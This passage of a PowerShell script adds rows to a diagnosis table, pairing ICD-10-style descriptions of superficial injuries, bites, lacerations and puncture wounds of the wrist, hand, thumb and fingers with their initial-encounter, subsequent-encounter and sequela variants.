$null = $DiagnosisList.Rows.Add("Superficial foreign body of left wrist","Superficial foreign body of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified wrist","Superficial foreign body of unspecified wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified wrist","Superficial foreign body of unspecified wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified wrist","Superficial foreign body of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right wrist","Insect bite (nonvenomous) of right wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right wrist","Insect bite (nonvenomous) of right wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right wrist","Insect bite (nonvenomous) of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left wrist","Insect bite (nonvenomous) of left wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left wrist","Insect bite (nonvenomous) of left wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left wrist","Insect bite (nonvenomous) of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified wrist","Insect bite (nonvenomous) of unspecified wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified wrist","Insect bite (nonvenomous) of unspecified wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified wrist","Insect bite (nonvenomous) of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right wrist","Other superficial bite of right wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right wrist","Other superficial bite of right wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right wrist","Other superficial bite of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left wrist","Other superficial bite of left wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left wrist","Other superficial bite of left wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left wrist","Other superficial bite of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified wrist","Other superficial bite of unspecified wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified wrist","Other superficial bite of unspecified wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified wrist","Other superficial bite of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right wrist","Unspecified superficial injury of right wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right wrist","Unspecified superficial injury of right wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right wrist","Unspecified superficial injury of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left wrist","Unspecified superficial injury of left wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left wrist","Unspecified superficial injury of left wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left wrist","Unspecified superficial injury of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified wrist","Unspecified superficial injury of unspecified wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified wrist","Unspecified superficial injury of unspecified wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified wrist","Unspecified superficial injury of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right hand","Unspecified superficial injury of right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right hand","Unspecified superficial injury of right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right hand","Unspecified superficial injury of right hand, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left hand","Unspecified superficial injury of left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left hand","Unspecified superficial injury of left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left hand","Unspecified superficial injury of left hand, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified hand","Unspecified superficial injury of unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified hand","Unspecified superficial injury of unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified hand","Unspecified superficial injury of unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right thumb","Unspecified superficial injury of right thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right thumb","Unspecified superficial injury of right thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right thumb","Unspecified superficial injury of right thumb, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left thumb","Unspecified superficial injury of left thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left thumb","Unspecified superficial injury of left thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left thumb","Unspecified superficial injury of left thumb, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified thumb","Unspecified superficial injury of unspecified thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified thumb","Unspecified superficial injury of unspecified thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified thumb","Unspecified superficial injury of unspecified thumb, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right index finger","Unspecified superficial injury of right index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right index finger","Unspecified superficial injury of right index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right index finger","Unspecified superficial injury of right index finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left index finger","Unspecified superficial injury of left index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left index finger","Unspecified superficial injury of left index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left index finger","Unspecified superficial injury of left index finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right middle finger","Unspecified superficial injury of right middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right middle finger","Unspecified superficial injury of right middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right middle finger","Unspecified superficial injury of right middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left middle finger","Unspecified superficial injury of left middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left middle finger","Unspecified superficial injury of left middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left middle finger","Unspecified superficial injury of left middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right ring finger","Unspecified superficial injury of right ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right ring finger","Unspecified superficial injury of right ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right ring finger","Unspecified superficial injury of right ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left ring finger","Unspecified superficial injury of left ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left ring finger","Unspecified superficial injury of left ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left ring finger","Unspecified superficial injury of left ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right little finger","Unspecified superficial injury of right little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right little finger","Unspecified superficial injury of right little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right little finger","Unspecified superficial injury of right little finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left little finger","Unspecified superficial injury of left little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left little finger","Unspecified superficial injury of left little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left little finger","Unspecified superficial injury of left little finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of other finger","Unspecified superficial injury of other finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of other finger","Unspecified superficial injury of other finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of other finger","Unspecified superficial injury of other finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified finger","Unspecified superficial injury of unspecified finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified finger","Unspecified superficial injury of unspecified finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified finger","Unspecified superficial injury of unspecified finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right thumb without damage to nail","Unspecified open wound of right thumb without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right thumb without damage to nail","Unspecified open wound of right thumb without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right thumb without damage to nail","Unspecified open wound of right thumb without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left thumb without damage to nail","Unspecified open wound of left thumb without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left thumb without damage to nail","Unspecified open wound of left thumb without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left thumb without damage to nail","Unspecified open wound of left thumb without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified thumb without damage to nail","Unspecified open wound of unspecified thumb without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified thumb without damage to nail","Unspecified open wound of unspecified thumb without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified thumb without damage to nail","Unspecified open wound of unspecified thumb without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right thumb without damage to nail","Laceration without foreign body of right thumb without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right thumb without damage to nail","Laceration without foreign body of right thumb without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right thumb without damage to nail","Laceration without foreign body of right thumb without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left thumb without damage to nail","Laceration without foreign body of left thumb without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left thumb without damage to nail","Laceration without foreign body of left thumb without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left thumb without damage to nail","Laceration without foreign body of left thumb without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified thumb without damage to nail","Laceration without foreign body of unspecified thumb without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified thumb without damage to nail","Laceration without foreign body of unspecified thumb without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified thumb without damage to nail","Laceration without foreign body of unspecified thumb without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right thumb without damage to nail","Laceration with foreign body of right thumb without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right thumb without damage to nail","Laceration with foreign body of right thumb without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right thumb without damage to nail","Laceration with foreign body of right thumb without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left thumb without damage to nail","Laceration with foreign body of left thumb without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left thumb without damage to nail","Laceration with foreign body of left thumb without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left thumb without damage to nail","Laceration with foreign body of left thumb without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified thumb without damage to nail","Laceration with foreign body of unspecified thumb without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified thumb without damage to nail","Laceration with foreign body of unspecified thumb without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified thumb without damage to nail","Laceration with foreign body of unspecified thumb without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right thumb without damage to nail","Puncture wound without foreign body of right thumb without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right thumb without damage to nail","Puncture wound without foreign body of right thumb without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right thumb without damage to nail","Puncture wound without foreign body of right thumb without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left thumb without damage to nail","Puncture wound without foreign body of left thumb without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left thumb without damage to nail","Puncture wound without foreign body of left thumb without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left thumb without damage to nail","Puncture wound without foreign body of left thumb without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified thumb without damage to nail","Puncture wound without foreign body of unspecified thumb without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified thumb without damage to nail","Puncture wound without foreign body of unspecified thumb without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified thumb without damage to nail","Puncture wound without foreign body of unspecified thumb without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right thumb without damage to nail","Puncture wound with foreign body of right thumb without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right thumb without damage to nail","Puncture wound with foreign body of right thumb without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right thumb without damage to nail","Puncture wound with foreign body of right thumb without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left thumb without damage to nail","Puncture wound with foreign body of left thumb without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left thumb without damage to nail","Puncture wound with foreign body of left thumb without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left thumb without damage to nail","Puncture wound with foreign body of left thumb without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified thumb without damage to nail","Puncture wound with foreign body of unspecified thumb without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified thumb without damage to nail","Puncture wound with foreign body of unspecified thumb without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified thumb without damage to nail","Puncture wound with foreign body of unspecified thumb without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of right thumb without damage to nail","Open bite of right thumb without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right thumb without damage to nail","Open bite of right thumb without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right thumb without damage to nail","Open bite of right thumb without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of left thumb without damage to nail","Open bite of left thumb without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left thumb without damage to nail","Open bite of left thumb without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left thumb without damage to nail","Open bite of left thumb without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified thumb without damage to nail","Open bite of unspecified thumb without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified thumb without damage to nail","Open bite of unspecified thumb without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified thumb without damage to nail","Open bite of unspecified thumb without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right thumb with damage to nail","Unspecified open wound of right thumb with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right thumb with damage to nail","Unspecified open wound of right thumb with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right thumb with damage to nail","Unspecified open wound of right thumb with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left thumb with damage to nail","Unspecified open wound of left thumb with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left thumb with damage to nail","Unspecified open wound of left thumb with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left thumb with damage to nail","Unspecified open wound of left thumb with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified thumb with damage to nail","Unspecified open wound of unspecified thumb with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified thumb with damage to nail","Unspecified open wound of unspecified thumb with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified thumb with damage to nail","Unspecified open wound of unspecified thumb with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right thumb with damage to nail","Laceration without foreign body of right thumb with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right thumb with damage to nail","Laceration without foreign body of right thumb with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right thumb with damage to nail","Laceration without foreign body of right thumb with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left thumb with damage to nail","Laceration without foreign body of left thumb with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left thumb with damage to nail","Laceration without foreign body of left thumb with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left thumb with damage to nail","Laceration without foreign body of left thumb with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified thumb with damage to nail","Laceration without foreign body of unspecified thumb with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified thumb with damage to nail","Laceration without foreign body of unspecified thumb with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified thumb with damage to nail","Laceration without foreign body of unspecified thumb with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right thumb with damage to nail","Laceration with foreign body of right thumb with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right thumb with damage to nail","Laceration with foreign body of right thumb with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right thumb with damage to nail","Laceration with foreign body of right thumb with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left thumb with damage to nail","Laceration with foreign body of left thumb with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left thumb with damage to nail","Laceration with foreign body of left thumb with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left thumb with damage to nail","Laceration with foreign body of left thumb with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified thumb with damage to nail","Laceration with foreign body of unspecified thumb with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified thumb with damage to nail","Laceration with foreign body of unspecified thumb with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified thumb with damage to nail","Laceration with foreign body of unspecified thumb with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right thumb with damage to nail","Puncture wound without foreign body of right thumb with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right thumb with damage to nail","Puncture wound without foreign body of right thumb with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right thumb with damage to nail","Puncture wound without foreign body of right thumb with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left thumb with damage to nail","Puncture wound without foreign body of left thumb with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left thumb with damage to nail","Puncture wound without foreign body of left thumb with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left thumb with damage to nail","Puncture wound without foreign body of left thumb with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified thumb with damage to nail","Puncture wound without foreign body of unspecified thumb with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified thumb with damage to nail","Puncture wound without foreign body of unspecified thumb with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified thumb with damage to nail","Puncture wound without foreign body of unspecified thumb with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right thumb with damage to nail","Puncture wound with foreign body of right thumb with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right thumb with damage to nail","Puncture wound with foreign body of right thumb with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right thumb with damage to nail","Puncture wound with foreign body of right thumb with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left thumb with damage to nail","Puncture wound with foreign body of left thumb with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left thumb with damage to nail","Puncture wound with foreign body of left thumb with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left thumb with damage to nail","Puncture wound with foreign body of left thumb with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified thumb with damage to nail","Puncture wound with foreign body of unspecified thumb with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified thumb with damage to nail","Puncture wound with foreign body of unspecified thumb with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified thumb with damage to nail","Puncture wound with foreign body of unspecified thumb with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of right thumb with damage to nail","Open bite of right thumb with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right thumb with damage to nail","Open bite of right thumb with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right thumb with damage to nail","Open bite of right thumb with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of left thumb with damage to nail","Open bite of left thumb with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left thumb with damage to nail","Open bite of left thumb with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left thumb with damage to nail","Open bite of left thumb with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified thumb with damage to nail","Open bite of unspecified thumb with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified thumb with damage to nail","Open bite of unspecified thumb with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified thumb with damage to nail","Open bite of unspecified thumb with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right index finger without damage to nail","Unspecified open wound of right index finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right index finger without damage to nail","Unspecified open wound of right index finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right index finger without damage to nail","Unspecified open wound of right index finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left index finger without damage to nail","Unspecified open wound of left index finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left index finger without damage to nail","Unspecified open wound of left index finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left index finger without damage to nail","Unspecified open wound of left index finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right middle finger without damage to nail","Unspecified open wound of right middle finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right middle finger without damage to nail","Unspecified open wound of right middle finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right middle finger without damage to nail","Unspecified open wound of right middle finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left middle finger without damage to nail","Unspecified open wound of left middle finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left middle finger without damage to nail","Unspecified open wound of left middle finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left middle finger without damage to nail","Unspecified open wound of left middle finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right ring finger without damage to nail","Unspecified open wound of right ring finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right ring finger without damage to nail","Unspecified open wound of right ring finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right ring finger without damage to nail","Unspecified open wound of right ring finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left ring finger without damage to nail","Unspecified open wound of left ring finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left ring finger without damage to nail","Unspecified open wound of left ring finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left ring finger without damage to nail","Unspecified open wound of left ring finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right little finger without damage to nail","Unspecified open wound of right little finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right little finger without damage to nail","Unspecified open wound of right little finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right little finger without damage to nail","Unspecified open wound of right little finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left little finger without damage to nail","Unspecified open wound of left little finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left little finger without damage to nail","Unspecified open wound of left little finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left little finger without damage to nail","Unspecified open wound of left little finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of other finger without damage to nail","Unspecified open wound of other finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of other finger without damage to nail","Unspecified open wound of other finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of other finger without damage to nail","Unspecified open wound of other finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified finger without damage to nail","Unspecified open wound of unspecified finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified finger without damage to nail","Unspecified open wound of unspecified finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified finger without damage to nail","Unspecified open wound of unspecified finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right index finger without damage to nail","Laceration without foreign body of right index finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right index finger without damage to nail","Laceration without foreign body of right index finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right index finger without damage to nail","Laceration without foreign body of right index finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left index finger without damage to nail","Laceration without foreign body of left index finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left index finger without damage to nail","Laceration without foreign body of left index finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left index finger without damage to nail","Laceration without foreign body of left index finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right middle finger without damage to nail","Laceration without foreign body of right middle finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right middle finger without damage to nail","Laceration without foreign body of right middle finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right middle finger without damage to nail","Laceration without foreign body of right middle finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left middle finger without damage to nail","Laceration without foreign body of left middle finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left middle finger without damage to nail","Laceration without foreign body of left middle finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left middle finger without damage to nail","Laceration without foreign body of left middle finger 